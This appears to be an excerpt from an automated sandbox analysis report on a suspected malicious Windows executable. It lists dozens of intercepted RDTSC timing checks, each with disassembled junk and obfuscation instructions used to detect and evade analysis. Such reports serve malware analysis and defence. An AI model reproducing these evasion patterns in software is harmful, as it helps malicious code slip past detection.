Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 77B7EC second address: 77B82B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007F8CEC76E1F6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F8CEC76E1F8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov di, si 0x0000002a push 00000000h 0x0000002c stc 0x0000002d push 00000000h 0x0000002f add dword ptr [ebp+1245097Eh], eax 0x00000035 xchg eax, ebx 0x00000036 push ebx 0x00000037 pushad 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 77AB7A second address: 77AB80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 77AB80 second address: 77AB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 77E3CE second address: 77E3D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8CECAE0756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 782903 second address: 782913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F8CEC76E1F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78596F second address: 785975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 785975 second address: 785991 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CEC76E208h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 785F19 second address: 785F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push esi 0x00000008 pushad 0x00000009 jmp 00007F8CECAE0767h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 77F6D2 second address: 77F6D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 782AA1 second address: 782AC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F8CECAE0756h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8CECAE0763h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7839F8 second address: 7839FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7871C9 second address: 7871CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78816E second address: 788172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7871CD second address: 7871D7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8CECAE0756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7890D8 second address: 7890DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 788172 second address: 788176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7890DC second address: 7890E6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8CEC76E1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7871D7 second address: 787260 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F8CECAE075Dh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F8CECAE0758h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov edi, ebx 0x0000002a push dword ptr fs:[00000000h] 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F8CECAE0758h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b mov dword ptr fs:[00000000h], esp 0x00000052 mov ebx, edx 0x00000054 mov eax, dword ptr [ebp+122D085Dh] 0x0000005a mov edi, dword ptr [ebp+122D2ABDh] 0x00000060 push FFFFFFFFh 0x00000062 movzx edi, ax 0x00000065 nop 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F8CECAE075Ch 0x0000006d rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 788176 second address: 78817C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7890E6 second address: 7890EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7890EB second address: 7890F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78A1DD second address: 78A1E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78A1E3 second address: 78A1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78B052 second address: 78B0AD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8CECAE0764h 0x00000008 jmp 00007F8CECAE075Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 mov dword ptr [ebp+122D3764h], ecx 0x00000018 push 00000000h 0x0000001a or di, 84ABh 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007F8CECAE0758h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000016h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b mov edi, dword ptr [ebp+122D2BC9h] 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 jo 00007F8CECAE0756h 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78B0AD second address: 78B0B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78B0B3 second address: 78B0C5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8CECAE0756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78C053 second address: 78C05D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8CEC76E1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78B2D1 second address: 78B2E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F8CECAE0758h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78C05D second address: 78C063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78C063 second address: 78C0BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8CECAE0763h 0x0000000e nop 0x0000000f push esi 0x00000010 mov dword ptr [ebp+122D1868h], ecx 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F8CECAE0758h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 add di, E0B8h 0x00000038 mov edi, 5DE76462h 0x0000003d push 00000000h 0x0000003f xchg eax, esi 0x00000040 push eax 0x00000041 push edx 0x00000042 jp 00007F8CECAE0758h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78C0BF second address: 78C0C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78CFD9 second address: 78D005 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push esi 0x00000009 jmp 00007F8CECAE075Bh 0x0000000e pop esi 0x0000000f nop 0x00000010 cmc 0x00000011 push 00000000h 0x00000013 cmc 0x00000014 push 00000000h 0x00000016 mov edi, dword ptr [ebp+122D2201h] 0x0000001c xchg eax, esi 0x0000001d jc 00007F8CECAE075Eh 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78C234 second address: 78C238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78EFD4 second address: 78EFD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78F125 second address: 78F135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CEC76E1FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78F135 second address: 78F164 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CECAE0762h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8CECAE0764h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78F164 second address: 78F16E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8CEC76E1F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 78F268 second address: 78F279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CECAE075Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 79788A second address: 7978A0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8CEC76E1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F8CEC76E1FCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7978A0 second address: 7978A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7978A7 second address: 7978AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 797D25 second address: 797D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 797D2B second address: 797D37 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 797D37 second address: 797D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 79D7D6 second address: 79D7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7A1B07 second address: 7A1B51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CECAE075Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8CECAE0761h 0x0000000f je 00007F8CECAE0756h 0x00000015 push edx 0x00000016 pop edx 0x00000017 jmp 00007F8CECAE0765h 0x0000001c popad 0x0000001d pushad 0x0000001e jp 00007F8CECAE0756h 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7A25B6 second address: 7A25BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7A29E7 second address: 7A29ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7A81B2 second address: 7A81B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7A72AF second address: 7A72CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8CECAE0764h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7A79A3 second address: 7A79A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7A79A8 second address: 7A79B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8CECAE0756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7A79B2 second address: 7A79CB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8CEC76E1FEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7A79CB second address: 7A79CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7A7C9B second address: 7A7CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7A7CA0 second address: 7A7CA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7A7CA5 second address: 7A7CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007F8CEC76E1F6h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7A7CB7 second address: 7A7CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 75AD14 second address: 75AD31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CEC76E206h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7AC794 second address: 7AC7A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F8CECAE0756h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7AC7A2 second address: 7AC7A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7AC7A6 second address: 7AC7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8CECAE075Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7AC7BC second address: 7AC7D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CEC76E1FFh 0x00000008 je 00007F8CEC76E1F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7AC329 second address: 7AC33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8CECAE075Bh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7AD5CC second address: 7AD5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7B1AFE second address: 7B1B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7B1B06 second address: 7B1B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7B1B10 second address: 7B1B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F8CECAE0756h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7B1B1F second address: 7B1B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7B1B23 second address: 7B1B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7B1B29 second address: 7B1B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8CEC76E1FBh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 772A9E second address: 75A1FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov ecx, dword ptr [ebp+122D2AA9h] 0x0000000d jc 00007F8CECAE075Eh 0x00000013 ja 00007F8CECAE0758h 0x00000019 call dword ptr [ebp+122D1A93h] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 772EEA second address: 5C7A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CEC76E1FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D2D1Dh], edi 0x00000012 push dword ptr [ebp+122D0D01h] 0x00000018 mov dh, FEh 0x0000001a call dword ptr [ebp+122D18FCh] 0x00000020 pushad 0x00000021 js 00007F8CEC76E1FCh 0x00000027 mov dword ptr [ebp+122D2E24h], edx 0x0000002d xor eax, eax 0x0000002f jnp 00007F8CEC76E202h 0x00000035 jg 00007F8CEC76E1FCh 0x0000003b jnc 00007F8CEC76E1F6h 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 pushad 0x00000046 add ebx, 33925491h 0x0000004c and edi, 73B2AC08h 0x00000052 popad 0x00000053 mov dword ptr [ebp+122D2CB9h], eax 0x00000059 sub dword ptr [ebp+122D1911h], esi 0x0000005f mov esi, 0000003Ch 0x00000064 pushad 0x00000065 or si, 7A1Bh 0x0000006a popad 0x0000006b add esi, dword ptr [esp+24h] 0x0000006f jmp 00007F8CEC76E1FCh 0x00000074 add dword ptr [ebp+122D1911h], edi 0x0000007a lodsw 0x0000007c stc 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 clc 0x00000082 sub dword ptr [ebp+122D32B7h], esi 0x00000088 mov ebx, dword ptr [esp+24h] 0x0000008c pushad 0x0000008d or edx, dword ptr [ebp+122D2BA1h] 0x00000093 mov dword ptr [ebp+122D32B7h], eax 0x00000099 popad 0x0000009a nop 0x0000009b push eax 0x0000009c push edx 0x0000009d je 00007F8CEC76E1F8h 0x000000a3 pushad 0x000000a4 popad 0x000000a5 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 772FAA second address: 772FBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CECAE075Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7731C3 second address: 773203 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8CEC76E203h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e mov ecx, ebx 0x00000010 jmp 00007F8CEC76E207h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jc 00007F8CEC76E1F6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 773203 second address: 773207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 773207 second address: 77320D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7732E5 second address: 7732FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F8CECAE075Ah 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7732FF second address: 773305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 773305 second address: 773309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 773309 second address: 77330D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
